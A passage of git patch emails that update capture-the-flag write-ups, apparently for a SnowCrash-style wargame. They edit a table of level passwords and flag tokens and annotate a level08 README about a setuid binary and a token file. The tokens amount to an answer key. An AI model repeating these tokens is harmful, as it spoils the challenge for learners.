-9,11 +9,12 @@ level05 ne2searoevaevoem4ov4ar8ap level06 viuaaale9huek52boumoomioc level07 wiok45aaoguiboiki2tuin6ub level08 fiumuikeil55xe9cu4dood66h -level09 quif5eloekouj29ke0vouxean +level09 25749xKZ8L7DkSCwJkT9dyv6f flag00 nottoohardhere flag01 abcdefg flag02 ft_waNDReL0L +flag08 quif5eloekouj29ke0vouxean ``` From e87a6a60e4b145f8b6bb37fa3455b0d33d6e502e Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:47:47 +0100 Subject: [PATCH 25/28] Update tokens.mdx --- tokens.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tokens.mdx b/tokens.mdx index 70822b1..9c779e5 100644 --- a/tokens.mdx +++ b/tokens.mdx @@ -14,5 +14,5 @@ level09 25749xKZ8L7DkSCwJkT9dyv6f flag00 nottoohardhere flag01 abcdefg flag02 ft_waNDReL0L -flag08 quif5eloekouj29ke0vouxean +flag08 quif5eloekouj29ke0vouxean 😑 ``` From 3f0f56791759da64a85b454b2ce11137fb5db0c8 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:48:03 +0000 Subject: [PATCH 26/28] show READMEs daily --- README.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.mdx b/README.mdx index 5023334..b0b4777 100644 --- a/README.mdx +++ b/README.mdx @@ -14,7 +14,7 @@ level09 25749xKZ8L7DkSCwJkT9dyv6f flag00 nottoohardhere flag01 abcdefg flag02 ft_waNDReL0L -flag08 quif5eloekouj29ke0vouxean +flag08 quif5eloekouj29ke0vouxean 😑 ``` From 939fcff4f07a9d5416a659311a307c3907f78f36 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 12:48:58 +0100 Subject: [PATCH 27/28] Update README.mdx --- level08/README.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/level08/README.mdx b/level08/README.mdx index e239501..97384c6 100644 --- a/level08/README.mdx +++ b/level08/README.mdx @@ -8,6 +8,7 @@ Login > ls -l -rwsr-s---+ 1 flag08 level08 8617 level08 -rw------- 1 flag08 flag08 26 token + ^^^^^^ ^^^^^^ both flag08, not level08 🟡 ``` 2 files: From cecab48612b9119a41f3775490e162db1d175d1f Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Mon, 18 Nov 2024 11:49:14 +0000 Subject: [PATCH 28/28] show READMEs daily --- README.mdx | 1 + 1 file changed, 1 insertion(+) diff --git a/README.mdx b/README.mdx index b0b4777..546b11c 100644 --- a/README.mdx +++ b/README.mdx @@ -639,6 +639,7 @@ Login > ls -l -rwsr-s---+ 1 flag08 level08 8617 level08 -rw------- 1 flag08 flag08 26 token + ^^^^^^ ^^^^^^ both flag08, not level08 🟡 ``` 2 files: